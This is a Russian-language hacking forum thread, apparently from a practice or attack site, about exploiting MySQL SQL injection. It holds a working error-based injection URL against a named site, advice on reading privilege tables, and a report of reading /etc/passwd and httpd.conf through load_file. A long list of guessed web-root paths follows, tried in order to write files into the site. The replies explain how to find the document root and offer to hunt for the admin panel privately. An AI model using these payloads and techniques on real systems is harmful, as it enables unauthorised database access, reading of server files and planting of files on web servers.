02.06.2014, 21:58
|
|
Познающий
Регистрация: 20.10.2010
Сообщений: 52
С нами:
8190326
Репутация:
0
|
|
Помогите, как начинаю раскручивать - перекидывает на localhost...
Сообщение от None
cyberfight[antigoogle]ru/site/demos/search/?page=2
|
|
|
02.06.2014, 23:56
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
А что вы там крутите то ? Тут так-же, как с предыдущим сайтом.
Там есть более доступные варианты:
Код:
http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0))))
|
|
|
|
03.06.2014, 03:46
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Вопрос, наверное, тупой и т.д., но всё-таки:
При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот
|
|
|
|
03.06.2014, 08:11
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Aniweste
Вопрос, наверное, тупой и т.д., но всё-таки:
При выводе через SQL-injection данных из
information_schema.schemata schema_name
мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)?
Т.е. через
information_schema.schemata schema_name
получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот
Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён.
Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.
|
|
|
|
03.06.2014, 08:25
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.
|
|
|
|
03.06.2014, 15:18
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
BigBear, XAMEHA - спасибо за ответы
|
|
|
|
04.06.2014, 04:07
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Ещё один вопрос.
Сайт - site.com
File_priv - Y
Вывод /etc/passwd под пользователя user() web - /home/web
Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html"
Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12
Пытался заливать в:
Код:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found
Пытался также перезаписать robots.txt - 404 not found
И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:
1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?
P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin. |
|
|
|
04.06.2014, 08:21
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Aniweste
Пытался заливать в:
Код:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
Просто интересно, нахрена, если
Сообщение от None
DocumentRoot "/var/www/html"
Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !
Ответы:
1) Возможно. Правильный путь проверяется load_file любого существующего файла.
2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
|
|
|
|
04.06.2014, 08:47
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Aniweste
Ещё один вопрос.
Сайт
- site.com
File_priv
-
Y
Вывод /etc/passwd под пользователя user()
web -
/home/web
Вывод /etc/httpd/conf/httpd.conf
-
DocumentRoot "/var/www/html"
Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')
-
1,2,3,4,5,6,7,8,9,10,12
Пытался заливать в:
Код:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt
На результате это никак не сказалось. По сайту site.com/1.txt -
404 not found
Пытался также перезаписать robots.txt -
404 not found
И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:
1.
Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
2.
Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?
P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin. Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.
|
|
|
|
04.06.2014, 13:09
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Сообщение от BigBear
Просто интересно, нахрена, если
Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !
Ответы:
1) Возможно. Правильный путь проверяется load_file любого существующего файла.
2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
Я не дописал Тоже тестил:
Код:
/var/www/html/1.txt
/var/www/html/site/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site.com/1.txt
/var/www/html/web/site/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/1.txt
И также пробовал подгружать существующий в корне robots Результат такой же. Странно, что сразу не дописал
И нашёл php.ini в корне
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
